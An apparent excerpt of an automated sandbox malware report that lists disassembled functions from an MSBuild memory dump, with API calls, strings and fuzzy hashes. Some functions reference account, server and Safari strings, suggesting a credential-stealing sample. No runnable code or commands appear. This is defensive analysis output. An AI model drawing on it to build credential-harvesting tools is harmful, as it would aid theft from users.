Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659

Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE

Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00445426

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
String ID:
API String ID: 1828521557-0
Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9

Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2

memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@FilePointermemcpy
String ID:
API String ID: 609303285-0
Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9

Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00406BC1

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68

Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID:
API String ID: 2136311172-0
Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E

Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052

??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040B63A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D

Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040AA0B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0041530C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

Non-executed Functions

Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 004098EC

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
GlobalLock.KERNEL32(00000000), ref: 00409927
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
GlobalUnlock.KERNEL32(00000000), ref: 0040994C
SetClipboardData.USER32(0000000D,00000000), ref: 00409955
GetLastError.KERNEL32 ref: 0040995D
CloseHandle.KERNEL32(?), ref: 00409969
GetLastError.KERNEL32 ref: 00409974
CloseClipboard.USER32 ref: 0040997D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69

Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
FreeLibrary.KERNEL32(00000000), ref: 004044E9
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514

Strings

comctl32.dll, xrefs: 004044AC
Error: Cannot load the common control classes., xrefs: 0040450E
Error, xrefs: 00404509
InitCommonControlsEx, xrefs: 004044CF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D

Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00418836
memcpy.MSVCRT(?,?,00000010), ref: 00418845
GetCurrentProcessId.KERNEL32 ref: 00418856
memcpy.MSVCRT(?,?,00000004), ref: 00418869
GetTickCount.KERNEL32 ref: 0041887D
memcpy.MSVCRT(?,?,00000004), ref: 00418890
QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
memcpy.MSVCRT(?,?,00000008), ref: 004188B6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795

Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00409882
wcslen.MSVCRT ref: 0040988F
GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
GlobalLock.KERNEL32(00000000), ref: 004098AC
memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
GlobalUnlock.KERNEL32(00000000), ref: 004098BE
SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
CloseClipboard.USER32 ref: 004098D7

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779

Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 004182D7

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
LocalFree.KERNEL32(?), ref: 00418342
free.MSVCRT ref: 00418370

Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
Part of subcall function 00417434: malloc.MSVCRT ref: 00417459

Strings

OsError 0x%x (%u), xrefs: 00418354

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
String ID: OsError 0x%x (%u)
API String ID: 2360000266-2664311388
Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9

Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85

OpenClipboard.USER32(?), ref: 00411878
GetLastError.KERNEL32 ref: 0041188D
DeleteFileW.KERNEL32(?), ref: 004118AC

Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
String ID:
API String ID: 2633007058-0
Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518

Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A

Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004173BE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A

Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02

Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004022A6
_wcsicmp.MSVCRT ref: 004022D7
_wcsicmp.MSVCRT ref: 00402305
_wcsicmp.MSVCRT ref: 00402333

Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B

memset.MSVCRT ref: 0040265F
memcpy.MSVCRT(?,?,00000011), ref: 0040269B

Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476

memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775

Strings

g, xrefs: 004023A3
t, xrefs: 00402647
X, xrefs: 0040262F
$, xrefs: 004025B7
y, xrefs: 004023CB
H, xrefs: 0040236C
@, xrefs: 0040253F
2, xrefs: 00402597
t, xrefs: 0040261F
w, xrefs: 004024E6
8, xrefs: 004024B5
~, xrefs: 0040258F
&, xrefs: 004025E7
>, xrefs: 00402371
z, xrefs: 0040256F
`, xrefs: 004024BA
!, xrefs: 0040252F
t, xrefs: 00402537
h, xrefs: 004024CE
&, xrefs: 00402399
>, xrefs: 00402380
Account, xrefs: 004022FA
\, xrefs: 00402517
', xrefs: 0040242A
K, xrefs: 00402402
), xrefs: 004025C7
b, xrefs: 0040238A
A, xrefs: 004023DF
^, xrefs: 00402627
Data, xrefs: 00402328
q, xrefs: 004024C4
}, xrefs: 0040237B
K, xrefs: 00402547
=, xrefs: 00402527
u, xrefs: 0040242F
u, xrefs: 0040247E
F, xrefs: 00402407
y, xrefs: 00402492
H, xrefs: 00402376
I, xrefs: 0040243E
Path, xrefs: 004022CC
n, xrefs: 0040255F
S, xrefs: 004024E1
a, xrefs: 004024F5
com.apple.Safari, xrefs: 00402664
com.apple.WebKit2WebProcess, xrefs: 0040268C
#, xrefs: 004025EF
n, xrefs: 004025A7
O, xrefs: 004023D5
0, xrefs: 00402451
{, xrefs: 004023EE
/, xrefs: 004024EB
L, xrefs: 0040260F
server, xrefs: 00402290

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 577499730-1134094380
Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767

Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040C899
_wcsicmp.MSVCRT ref: 0040C8B4
_wcsnicmp.MSVCRT ref: 0040C8CE
_wcsnicmp.MSVCRT ref: 0040C8E2
wcslen.MSVCRT ref: 0040C8F3
_wcsicmp.MSVCRT ref: 0040C915
memset.MSVCRT ref: 0040C95A
wcscpy.MSVCRT ref: 0040C967
wcslen.MSVCRT ref: 0040C988
wcslen.MSVCRT ref: 0040C9A0
_wcsicmp.MSVCRT ref: 0040C9EB
_wcsicmp.MSVCRT ref: 0040CA04
_wcsnicmp.MSVCRT ref: 0040CA1B
memset.MSVCRT ref: 0040CA61
wcschr.MSVCRT ref: 0040CA69
wcslen.MSVCRT ref: 0040CA71
wcscpy.MSVCRT ref: 0040CA8F
wcschr.MSVCRT ref: 0040CA9D
_wcsnicmp.MSVCRT ref: 0040CAD3
memset.MSVCRT ref: 0040CB07
strlen.MSVCRT ref: 0040CB0D
memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,00000175), ref: 0040CB29
strchr.MSVCRT ref: 0040CB3E
memset.MSVCRT ref: 0040CB68
memset.MSVCRT ref: 0040CB7D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040CB9E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040CBB1

Strings

:stringdata, xrefs: 0040C90F
ftp://, xrefs: 0040CA15
http://, xrefs: 0040C8C8
https://, xrefs: 0040C8DC

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
String ID: :stringdata$ftp://$http://$https://
API String ID: 2787044678-1921111777
Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9

Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0041402F
GetDlgItem.USER32(?,000003E8), ref: 0041403B
GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
GetWindowLongW.USER32(?,000000F0), ref: 00414056
GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
GetWindowLongW.USER32(?,000000EC), ref: 0041406B
GetWindowRect.USER32(00000000,?), ref: 0041407D
GetWindowRect.USER32(?,?), ref: 00414088
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
GetDC.USER32 ref: 004140E3
wcslen.MSVCRT ref: 00414123
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
ReleaseDC.USER32(?,?), ref: 00414181
_snwprintf.MSVCRT ref: 00414244
SetWindowTextW.USER32(?,?), ref: 00414258
SetWindowTextW.USER32(?,00000000), ref: 00414276
GetDlgItem.USER32(?,00000001), ref: 004142AC
GetWindowRect.USER32(00000000,?), ref: 004142BC
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
GetClientRect.USER32(?,?), ref: 004142E1
GetWindowRect.USER32(?,?), ref: 004142EB
